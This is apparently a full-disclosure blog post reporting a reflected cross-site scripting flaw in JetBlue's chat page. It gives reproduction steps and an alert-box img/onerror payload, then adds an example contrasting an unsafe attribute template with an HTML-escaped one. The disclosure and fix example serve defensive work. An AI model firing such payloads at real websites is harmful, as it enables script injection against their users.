Sunday, 19 March 2023

Full Disclosure - JetBlue Reflected Cross-Site Scripting

Application

  • JetBlue chat web page

Information

  • Input not validated
  • Reflected Cross-Site Scripting flaw

Exploit

XSS #1



1. Browse to Online Website

2. Select "/deals/from/new-york-city" page -> Search

3. Select Pages -> Have General Question -> Ask now

4. Paste Payload -> TEST"><img src=x onerror=alert(1)>
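
The `">` at the start of the payload suggests the chat input is reflected inside a double-quoted HTML attribute. The following added example (not part of the original post and not JetBlue's code; the template, the `question` field name and all function names are hypothetical) shows that kind of reflection beside an output-encoded version, using the payload above as input.

```javascript
// Added example: hypothetical chat page template, not JetBlue's code.
// Assumption: the submitted question is echoed into a double-quoted
// attribute value, as the `">` prefix of the payload suggests.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Encode every character that can end an attribute value or open a tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: the raw value is concatenated into the markup.
function renderQuestionUnsafe(question) {
  return `<input type="text" name="question" value="${question}">`;
}

// Hardened form: the value is encoded for the HTML attribute context.
function renderQuestionSafe(question) {
  return `<input type="text" name="question" value="${escapeHtml(question)}">`;
}

// Demonstration-only check: count element openings in the rendered markup.
// The template should only ever produce one element, the <input>.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

const payload = 'TEST"><img src=x onerror=alert(1)>'; // payload from the page

console.log('unsafe:', renderQuestionUnsafe(payload));
console.log('safe:  ', renderQuestionSafe(payload));
console.log('tags unsafe/safe:',
  countTags(renderQuestionUnsafe(payload)),
  countTags(renderQuestionSafe(payload)));
```

With encoding applied, the quote and angle brackets stay inside the attribute value as text, so the rendered markup still contains only the `<input>` element.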

